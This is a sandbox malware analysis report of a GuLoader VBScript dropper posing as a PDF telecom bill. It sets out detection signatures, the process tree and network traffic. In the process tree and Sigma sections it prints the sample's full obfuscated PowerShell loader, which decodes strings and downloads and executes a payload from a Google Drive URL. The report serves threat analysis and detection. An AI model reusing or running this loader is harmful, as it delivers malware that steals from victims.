Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs

Overview

General Information

Sample name:11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:11309-pdf.vbs
Analysis ID:1522523
MD5:cd9505a0c492be1e52f012f624835147
SHA1:bece8abdda5efe16102c4c04d66cb1ab644b0046
SHA256:9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    Process Memory Space: powershell.exe PID: 7432JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x54861:$b2: ::FromBase64String(
      • 0x736da:$b2: ::FromBase64String(
      • 0x73710:$b2: ::FromBase64String(
      • 0x73747:$b2: ::FromBase64String(
      • 0x7377f:$b2: ::FromBase64String(
      • 0x737b8:$b2: ::FromBase64String(
      • 0x737f2:$b2: ::FromBase64String(
      • 0x7382d:$b2: ::FromBase64String(
      • 0x73869:$b2: ::FromBase64String(
      • 0x738a6:$b2: ::FromBase64String(
      • 0x738e4:$b2: ::FromBase64String(
      • 0x73923:$b2: ::FromBase64String(
      • 0x73963:$b2: ::FromBase64String(
      • 0x739a4:$b2: ::FromBase64String(
      • 0x739e6:$b2: ::FromBase64String(
      • 0x73a29:$b2: ::FromBase64String(
      • 0x10ecfc:$b2: ::FromBase64String(
      • 0x10fd25:$b2: ::FromBase64String(
      • 0x19c00c:$b2: ::FromBase64String(
      • 0x19c089:$b2: ::FromBase64String(
      • 0x1b5889:$b2: ::FromBase64String(

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7432.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_7432.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe4ea:$b2: ::FromBase64String(
        • 0xd488:$s1: -join
        • 0x6c34:$s4: +=
        • 0x6cf6:$s4: +=
        • 0xaf1d:$s4: +=
        • 0xd03a:$s4: +=
        • 0xd324:$s4: +=
        • 0xd46a:$s4: +=
        • 0xf91d:$s4: +=
        • 0xf99d:$s4: +=
        • 0xfa63:$s4: +=
        • 0xfae3:$s4: +=
        • 0xfcb9:$s4: +=
        • 0xfd3d:$s4: +=
        • 0xdccc:$e4: Get-WmiObject
        • 0xdebb:$e4: Get-Process
        • 0xdf13:$e4: Start-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", ProcessId: 180, ProcessName: wscript.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs", ProcessId: 180, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArnery

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for domain / URL
        Source: http://pesterbdd.com/images/PeVirustotal: Detection: 6%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49705 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbn8 source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbc source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: scorlib.pdb= source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: U'n.pdb source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pe
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaWP
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
